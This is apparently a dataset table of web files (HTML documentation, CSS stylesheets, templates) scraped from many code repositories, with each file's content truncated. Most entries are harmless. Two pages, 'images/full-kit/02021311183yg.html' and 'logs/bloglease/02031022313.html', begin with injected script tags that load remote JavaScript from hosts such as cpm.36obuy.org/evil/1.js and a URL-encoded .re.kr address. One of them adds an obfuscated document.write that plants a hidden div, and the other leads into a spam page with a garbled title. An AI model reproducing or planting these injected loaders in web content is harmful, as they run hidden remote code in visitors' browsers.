path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
doc/html/qdomnode-members.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Qt 4.3: List of All Members for QDomNode</title>
<link href="classic.css" rel="stylesheet" type="text/cs... |
sites/all/modules/contrib/gss/gss.css | gzgrenard/mavic_dev |
.content .searchhead {
clear: both;
font-weight: bold;
margin: 10px 0;
}
.google-search-results,
.google-search-results .gss-result,
.google-search-results .gss-result .gss-title,
.google-search-results .gss-result .gss-search-snippet-info p,
div.item-list,
div.item-list ul.pager {
margin: 0;
} ... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/js/tryit0b8a.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/js/tryit.asp?filename=tryjs_function_expression_variable by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:36:19 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navi... |
images/full-kit/02021311183yg.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0... |
docs/doc/nalgebra/cross_matrix.v.html | TheZoq2/Rust-Scad | <!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="refresh" content="0;URL=fn.cross_matrix.html">
</head>
<body>
<p>Redirecting to <a href="fn.cross_matrix.html">fn.cross_matrix.html</a>...</p>
<script>location.replace("fn.cross_matrix.html" + location.search + location.hash);</script>
</body>
</html... |
Documentacion/html/functions_func_s.html | tonihr/pyGeo | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
src/tools/customwidgets/data/selfavatarmenu_button_style.css | AlekSi/Jabbin | QToolButton {
border: none;
margin: 4px;
}
QToolButton:hover {
background-color: white;
border: 4px solid white;
margin: 0px;
}
|
tmp/install_526024601f449/framework/framework/j2/media/nnframework/css/ap3.css | alons182/3monkiescr | /**
* NoNumber Framework stylesheet for AdminPraise 3 template
*
* @package NoNumber Framework
* @version 13.9.6
*
* @author Peter van Westen <peter@nonumber.nl>
* @link http://www.nonumber.nl
* @copyright Copyright © 2013 NoNumber All Rights Reserved
* @license ... |
views/news/netctl-is-now-in-core.html | ArchLinuxJP/archweb-jp | <p>systemd によるプロファイルベースのネットワーク設定 CLI である netctl を紹介します。将来的に、旧式の netcfg は <code>[core]</code> から削除されます。netcfg を使用しているユーザーは netctl に移行することを推奨します。移行は手動で行う必要があり、その間インターネットにアクセスできなくなる可能性があるため、十分注意して man ページを読んで移行してください (netctl(1), netctl.profile(5), netctl.special(7))。</p>
<p>netctl の設計は systemd ユーザーと netcfg ユーザー双方にとって習熟しやす... |
wp-content/themes/smallfolio/css/blue.css | Skelroth/Swanky | a {
color: #41a8b2;
}
.sf-menu li.current_page_item a, .sf-menu li a:hover, .sf-menu li.current-cat a {
color: #41a8b2;
}
blockquote {
color: #41a8b2;
border-left: 1px solid #41a8b2;
}
#left_sidebar li a {
color: #41a8b2;
}
#left_sidebar li li a {
color: #296268;
}
#tagline {
background: url(blue/tagline.png) no... |
original/index.html | xoioix/xoioix.github.io | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<title>JQuery xxxxxxxx News Ticker | ... |
wp-content/themes/heartless/rtl.css | SkullMasher/blogheartless | /*
Theme Name: Heartless
Adding support for language written in a Right To Left (RTL) direction is easy -
it's just a matter of overwriting all the horizontal positioning attributes
of your CSS stylesheet in a separate stylesheet file named rtl.css.
http://codex.wordpress.org/Right_to_Left_Language_Support
*/
/*
bo... |
static/css/product_list.css | GreatDevelopers/LibreHatti | @font-face {
font-family: 'Bitter Fonts';
src:
url('../fonts/Bitter/Bitter-Regular.ttf');
}
* {
margin:0px;
padding:0px;
}
body{
color:#333;
line-height:2;
font-family:'Bitter Fonts', serif;
}
.wrapper{
max-width:700px;
margin:auto;
}
h2 {
text-align:center;
font-weight:400;
font-size:24px;
}
.leaf-ca... |
jsdoc/web-dev_private_js_services_roles.js.html | CELTAB/rfidmonitor-platform | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: web-dev/private/js/services/roles.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.c... |
templates/uber/local/acm/gallery/css/themes/red/style.css | ForAEdesWeb/AEW22 | .acm-gallery .btn {
margin-top: 26px;
}
.acm-gallery .btn > fa {
margin-left: 5px;
}
.acm-gallery .isotope-layout {
overflow: hidden;
}
.acm-gallery .isotope-layout .custom.bg-image {
padding: 0;
position: static;
}
.acm-gallery .isotope-layout .isotope:after {
content: '';
display: block;
clear: both;
... |
app_04_z1013-128/assets/db/b8c97ca003ad9c3c961e72f0990b5718-demo_z1013_v1/index.html | anchorz/sdcc-z1013-kc85 | <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="de" xml:lang="de">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="shortcut icon" href="./favicon.ico" type="image/x-icon" />
<link rel="icon" href="./favicon.ico" type="image/x-icon" />
<meta name="descrip... |
google35ca1d63eeefbef3.html | stewgeo/partners_property_auctions | google-site-verification: google35ca1d63eeefbef3.html |
09 - Meta name.html | oscarmaso/html | <!DOCTYPE html>
<html>
<head>
<title>Max Power motor</title>
<meta charset="utf-8">
<meta name="author" content="Dosa Desarr." />
<meta name="description"
content="Pagina de coches y de vehículos de ocasión y superchollos" />
<meta name="generator"
content="Sublime Text 3.0" />
<meta name="keywords"
conte... |
turbulence/docs/states/package-frame.html | PaintScratcher/WAW-SEPR-Website | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_07) on Wed Jan 22 03:27:45 GMT 2014 -->
<title>states</title>
<meta name="date" content="2014-01-22">
<link rel="stylesheet" type="text... |
www/index.html | akpensinger/Something-The-Point-of-Everything |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>So... |
web/src/index.html | agreatfool/EvernoteBlog | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Evernote Blog</title>
</head>
<body>
<div>
<h1>blog!</h1>
</div>
<!-- footer scripts -->
<script data-main="js/boot" src="js/requirejs/require.min.js">
</script>
... |
defaultstuff/css/screen.css | johnsons531/openaccessphilly-oldsite | *
{
padding:0;
margin:0;
}
.pngfix,
.imgpng
{
behavior: url('../iepngfix.htc');
}
.clear
{
clear:both;
line-height:0px;
}
body
{
text-align:center;
}
.cleft
{
clear:left;
line-height:0px;
}
.cright
{
clear:right;
line-height:0px;
}
html, body {
height: 100%;
backg... |
editor/extensions/popups/jcemediabox/css/jcemediabox.css | widgetfactory/jce-editor | /**
* @package JCE
* @copyright Copyright (c) 2009-2015 Ryan Demmer. All rights reserved.
* @license GNU/GPL 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
* JCE is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it incl... |
doc/manual.css | jakobkroeker/float | /* gapdoc.css Frank Lübeck */
/* $Id$ */
/* basic settings */
body {
position: relative;
background: #ffffff;
color: #000000;
/* background-image: url(gapdoc.jpg);
margin-top: 15px;
margin-bottom: 15px;
margin-left: 10px;
margin-right: 10px; */
width: 70%;
margin: 0pt;
padding: 15pt;
... |
wp-content/themes/original/vfgv2013/library/css/style.css | samuelmolinski/drunken-octo-sansa | /* This beautiful CSS-File has been crafted with LESS (lesscss.org) and compiled by simpLESS (wearekiss.com/simpless) */
.post-content .alignleft, .post-content img.alignleft {
margin-right:1.5em;
display:inline;
float:left
}
.post-content .alignright, .post-content img.alignright {
margin-left:1.5em;
display:inli... |
doc/html/qcleanlooksstyle.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Qt 4.3: QCleanlooksStyle Class Reference</title>
<link href="classic.css" rel="stylesheet" type="text/cs... |
logs/bloglease/02031022313.html | ForAEdesWeb/AEW2 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×... |
OpenJML/testfiles/jmldoc3/expected/Vis.C_public.html | shunghsiyu/OpenJML_XOR | <!-- Generated by jmldoc -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML lang="en">
<HEAD>
<TITLE>
Vis.C_public
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascri... |
web/WEB-INF/classes/gwt-2.6.0/doc/javadoc/com/google/gwt/cell/client/class-use/SelectionCell.Template.html | JakaCikac/dScrum | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<TITLE>
Uses of Interface com.google.gwt.cell.client.SelectionCell.Template (Google Web Toolkit Javadoc)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../styleshe... |
liblinphone-sdk/armv7s-apple-darwin/share/doc/ortp-0.22.0/html/structmsgb.html | dungproton/noname | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
sites/all/modules/user_details/css/user_details_loggedin_admin.css | creazy412/vmware-win10-c65-drupal7 | /**
* @file
*/
/**
* Block Styling
*/
/** Template Style **/
#user-details-loggedin-admin-form #edit-loggedin-template-style label {
float: left;
margin-right: 5px;
}
/** Stats **/
#user-details-loggedin-admin-form #edit-loggedin-stats .form-checkbox {
float: left;
margin-right: 5px;
margin-top: 4px;
... |
apps/lost-stolen-damaged/views/confirm.html | daniel-ac-martin/brp_app | {{<layout}}
{{$step}}Step 5 of 5{{/step}}
{{$journeyHeader}}
{{#t}}journeys.lost.header{{/t}}
{{/journeyHeader}}
{{$validationSummary}}
{{> partials-validation-summary}}
{{/validationSummary}}
{{$propositionHeader}}
{{> partials-navigation}}
{{/propositionHeader}}
{{$header}}{{#t}}pages.ch... |
wp-content/themes/buddyboss/_inc/css/buddybar.css | shaonsikdar/Wishmagnet | /*--------------------------------------------------------------
Styles for the BuddyBar - My Account, Notifications, etc.
--------------------------------------------------------------*/
body {
padding-top: 25px;
}
#wp-admin-bar {
position: absolute;
top: 0;
left: 0;
z-index: 99;
height: 0;
font-size: 11px;
w... |
jadefiles/head.html | aguilaw/dyno-thumbs | <head>
<link rel='shortcut icon' type='image/x-icon' href='favicon.ico' />
<link rel="stylesheet" href="assets/css/main.css">
<meta name="viewport" content="width=device-width">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<title>Dyno-Thumbs</title>
<!--JQUERY-->
<script src="assets/js-... |
Documentation/PROGETTO JONATHAN E FRANCESCO/skins/css/orange.css | Tondan/TDW | .nav-main .nav-link .nav-ul > li:hover a,
.nav-main .nav-link .nav-ul > li.active a,
.nav-main .nav-link .nav-ul > li ul li a,
#main_banner .banner-text .top-title label,
#footer .footer-link ul li a:hover,
#footer .footer-bottom p a,
.book-tabel .form-view .submit-slide:hover .fa ,
.news-block .news-box a,
.style-box ... |
Modulo5/BookStoreWeb/dist/javadoc/bookstore/integration/ddbb/factory/package-tree.html | pablo-albaladejo/javaee | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (version 1.7.0_17) on Wed Jan 29 09:59:52 CET 2014 -->
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>bookstore.int... |
lib/dhtmlxSuite/docsExplorer/visualdesigner/visualdesigner___designer_events.html | AutonomyLab/rosdash | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css"... |
RossFamilyTree/evt/9/8/d15f60940b16e879ceec03ffe89.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
php-manual/function.gupnp-service-notify.html | Sliim/sleemacs | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Notifies listening clients</title>
</head>
<body><div class="manualnavbar" style="text-align: center;">
<div class="pre... |
doc/javadoc/ch/intertec/storybook/view/dialog/net/package-tree.html | tmhorne/storybook | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0) on Sat Jul 30 16:24:39 CEST 2011 -->
<title>ch.intertec.storybook.view.dialog.net Class Hierarchy</title>
<meta name="date" content="2... |
templates/descriptionTable.html | MizarWeb/MizarWidget | <% for ( var key in properties )
{
if ( key != 'style' && key != 'title' && key != 'quicklook' && key != 'thumbnail' && key != 'abstract' && key != 'style' )
{
var stringKey = key.toString(); %>
<tr height="30%">
<% // Test if section
var title = dictionary[stringKey];
if (typeof (properties[key]) === "obje... |
Tests/PACKAGES/hexchat-2.12.4-6-x86_64/usr/share/gtk-doc/html/atk/AtkPlug.html | mgood7123/UPM | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>AtkPlug: ATK - Accessibility Toolkit</title>
<meta name="generator" content="DocBook XSL Stylesheets Vsnapshot">
<link rel="home" href="index.html" title="ATK - Access... |
moduleFiles/help/metarelateSiteBase/documentation/javadocs/net/metarelate/terminology/reasoning/ReasonerProxy.html | metarelate/terminology-server | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_45) on Fri Jun 14 04:56:04 BST 2013 -->
<TITLE>
ReasonerProxy
</TITLE>
<META NAME="date" CONTENT="2013-06-14">
<LINK REL ="stylesheet" TYPE="text/c... |
_source/news/2018-02-12-ravish.html | InstantKhabar/_source | ---
title: "प्राइवेट शिक्षण संस्थानों ने मचा रखी है लूट"
layout: item
category: ["UP"]
date: 2018-02-12T11:01:29.227Z
image: 1518453089227ravish.jpg
---
<p><strong>रविश अहमद</strong></p>
<p>निजी स्कूल संचालक स्वयंभू सरकार हैं और इनके प्रबन्धक व प्रधानाचार्य किसी सुप्रीम पॉवर से कम नही क्योंकि इन पर भारत सरकार अथवा किस... |
lwjgl-docs-2.8.2/javadoc/org/lwjgl/opengl/EXTSharedTexturePalette.html | kevinwang/minecarft | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_14) on Sun Nov 13 22:14:27 CET 2011 -->
<TITLE>
EXTSharedTexturePalette (LWJGL API)
</TITLE>
<META NAME="date" CONTENT="2011-11-13">
<LI... |
docs/assets/style.css | qwtel/hy-drawer | * { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; }
html { font-family:'Noto Sans', Helvetica, Arial, serif; font-size:16px; line-height:1.75; }
body { margin:0; padding:0; color:#000; background:#fff; }
a { color:#000; text-decoration:none; }
h1, h2, h3, h4, h5, h6, a { font-fami... |
src/pages/login/login.html | growu/drip-ionic3 | <ion-content class="login-page" padding no-bounce>
<div class="drip"></div>
<ion-row padding>
<ion-col (click)="goLoginDefaultPage()">
<button class="login-button" ion-button round block color="light">手机号/邮箱</button>
</ion-col>
</ion-row>
<dp-third-login></dp-third-login>
... |
doc/vs/rationalagent/RationalAgent.html | TeamSPoon/virtstoryteller | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_04) on Wed Dec 03 10:28:36 CET 2008 -->
<TITLE>
RationalAgent
</TITLE>
<META NAME="date" CONTENT="2008-12-03">
<LINK REL ="stylesheet" TYPE="text/c... |
doc/Javadoc/info/pavie/opennetworkmap/model/draw/network/grid/FlexibleGrid.html | PanierAvide/OpenNetworkMap | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (version 1.7.0_71) on Fri Jan 02 17:28:51 GMT 2015 -->
<title>FlexibleGrid</title>
<meta name="date" content="2015-01-02">
<link rel="stylesheet" type... |
server/ncm/templates/maker_directory.html | ScriptGadget/Creare | {% extends "base.html" %}
{% block sidebar %}
{% endblock %}
{% block content %}
<table id="maker_gallery">
<tr>
{% for store in stores %}
{% if not forloop.first %}
{% if forloop.counter0|divisibleby:"3" %}
</tr><tr>
{% endif %}
{% endif %}
<td>
<p><a href="/maker_store/{{store.slu... |
graph2.html | hichristo/justice-is-digital | <!DOCTYPE html>
<meta charset="utf-8">
<style>
.node {
stroke: #fff;
stroke-width: 1.5px;
}
.link {
stroke: #999;
stroke-opacity: .6;
}
.gnode test {
font-family: sans-serif;
}
.footer {
display: block;
}
#graph {
display: block;
}
</style>
<body>
<div id="graph"></div>
<script src="//d3js... |
dam/templates/cawas/series/add.html | emilianobilli/backend | {% extends "cawas/base.html" %}
{% block extra_head %}
<script src="/static/js/series.js"></script>
{% endblock %}
{% block subheader %}
<div class="col-xs-12 col-md-12 col-lg-12 unpad">
<div class="subHeader">
<div class="notifications">
{% if user.is_authenticated %}
... |
css/public.css | wp-plugins/history-search-by-webloft | strong {
font-weight: bold;
}
.lokalhistorie_skjema {
width: 98%;
margin: 20px 0px;
clear: both;
}
.lokalhistorie_skjema h2 {
color: #000;
width: 100%;
font-size: 1.6em;
border-bottom: 3px solid orange;
margin-bottom: 10px;
text-align: center;
}
.lokalhistorieresult {
padding: 10px 1%;
background: #ee... |
site/xref/wjhk/jupload2/gui/filepanel/FilePanel.html | Silverpeas/silverpeas-jupload | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>FilePanel xref</title>
<link type="text/css" r... |
javadoc/net/minecraft/client/resources/package-tree.html | Foghrye4/ihl | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_65) on Thu Feb 05 20:10:23 EST 2015 -->
<title>net.minecraft.client.resources Class Hierarchy (Forge API)</title>
<meta name="date" con... |
resources/Apache/Apache-POI-3.16-beta2/poi-bin-3.16-beta2-20170202/poi-3.16-beta2/docs/apidocs/org/apache/poi/sl/draw/class-use/DrawGroupShape.html | doughtnerd/POD | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<title>Uses of Class org.apache.poi.sl.draw.DrawGroupShape (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title=... |
deps/seqan-library-2.0.0/share/doc/seqan/html/specialization_WaveletTree.html | fmaguire/KAT | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="specialization_wavelettree" data-page="WaveletTree">
<head>
<meta http-equiv="Content-Type" content="text/html; char... |
InfoRetrievalSystem/dataset/CACM-2135.html | jrosseel/ProjectInformationRetrieval | <html>
<pre>
Rapid Computation of General Interpolation
Formulas and Mechanical Quadrature Rules
Let f have n continuous on a closed interval
[a,b] and let L be a linear functional. The attempt
is made to approximate L (f) with L (Q) where Q is a polynomial,
approximating f. Algorithms are developed
for rapid co... |
index.html | onlinegeek101/Avalon | <!doctype html>
<html>
<head>
<title>Socket.IO chat</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body { font: 13px Helvetica, Arial; }
/*form { background: #000; padding: 3px; position: fixed; bottom: 0; width: 100%; }
form input { border: 0; padding: 10px; widt... |
devmanual/general-concepts/emerge-and-ebuild/index.html | fusion809/fusion809.github.io-old | <!DOCTYPE html><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Gentoo Development Guide: Emerge and Ebuild Relationships</title>
<link rel="stylesheet" href="../../devmanual.css" type="text/css">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-s... |
aquamacs/doc/Aquamacs Help/calc/Composing-Patterns-in-Rewrite-Rules.html | xfq/aquamacs-emacs | <html lang="en">
<head>
<title>Composing Patterns in Rewrite Rules - GNU Emacs Calc Manual</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="GNU Emacs Calc Manual">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel... |
public/assets/vendor/summernote/coverage/PhantomJS 2.1.1 (Mac OS X 0.0.0)/html/src/js/lite/ui/TooltipUI.js.html | Yunfeng/h5buk | <!doctype html>
<html lang="en">
<head>
<title>Code coverage report for src/js/lite/ui/TooltipUI.js</title>
<meta charset="utf-8" />
<link rel="stylesheet" href="../../../../prettify.css" />
<link rel="stylesheet" href="../../../../base.css" />
<meta name="viewport" content="width=device-width, init... |
geonode/templates/base.html | PhilLidar-DAD/geonode | {% load i18n avatar_tags %}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>{% block title %}{{ SITE_NAME }}{% endblock %}</title>
{% block head %}
... |
1. Docs/Doxygen/html/system__stm32f10x_8c.html | MyEmbeddedWork/ARM_CORTEX_M3-STM32 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
src/components/start-view/start-view.css | ArcherSys/Padlock | :host {
display: block;
background-color: #59c6ff;
}
:host(.error) .error-message {
opacity: 1;
-ms-filter: none;
filter: none;
-webkit-transform: translate(0, 0);
-moz-transform: translate(0, 0);
-o-transform: translate(0, 0);
-ms-transform: translate(0, 0);
transform: translate(0, 0);
}
.wrapper {... |
RossFamilyTree/srn/5/2/78fce82336bbbdca7f6da7564b8f9325.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Surname - STREET</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ... |
aquamacs/doc/Aquamacs Help/gnus/Converting-Kill-Files.html | xfq/aquamacs-emacs | <html lang="en">
<head>
<title>Converting Kill Files - Gnus Manual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Gnus Manual">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Sc... |
templates/orc/results.html | mso-net/Sheck | {% extends "base.html" %}
{% set active_page_title = "ORC » Results" %}
{% set active_page = "orc" %}
{% block body %}
<div class="col-xs-12">
<table class="table table-striped">
<thead>
<tr>
<th>Server</th>
<th>User</th>
<th width="50%">Result</th>
<th width="10%"> </th>
</tr>
... |
developer-doc/html/functions_i.html | GroundhogLighting/glare | <!-- HTML header for doxygen 1.8.13-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" cont... |
CSC 445 WebCentric Programming/Final Project/poi-3.14/docs/apidocs/org/apache/poi/ss/formula/functions/class-use/Columns.html | jmemmons/university-assignments | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<TITLE>
Uses of Class org.apache.poi.ss.formula.functions.Columns (POI API Documentation)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITL... |
sources/wasc/2005/05/19-docket.html | jeffpar/courtcasts | <!DOCTYPE html>
<html>
<head>
<title>Washington State Courts - Supreme Court Calendar </title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="expires" content="0">
<meta http-equiv="Pragma" content="no-cache... |
blender/2.78c/blender-api/bpy.types.ParticleBrush.html | techdude1996/devhelp-books | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ParticleBrush(bpy_struct) — Blender 2.78.0 3c... |
ABoard/ABoard.Web/Content/Site.css | cygwin255/ABoard | .message
{
white-space: pre-line;
padding:5px;
background-color: #DDD;
}
.thread
{
margin-bottom:10px;
}
.post
{
border: 1px solid #CCC;
background-color: #DDD;
border-radius: 2px;
margin: 3px 0px 3px 0px;
display: inline-block;
padding: 5px;
}
hr
{
ma... |
web/test/tabTest1.html | aqucy/AqucyFramework | <!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
<link rel="stylesheet" type="text/css" href="../js/ext/resources/css/ext-all.css"/>
<link rel="stylesheet" type="text/css" href="../js/ext/docs/resources/docs.css"/>
<link rel="stylesheet" type="text/css" href="../js/ext/... |
examples/ol3_02_wmtsmap_async.html | lao-tseu-is-alive/gomap | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<meta name="viewport" content="initial-scale=1.0, user-scalable=no, width=device-width">
<title>ol3_02 wmts map</title>
<style>
html, body {
height: 100%;
... |
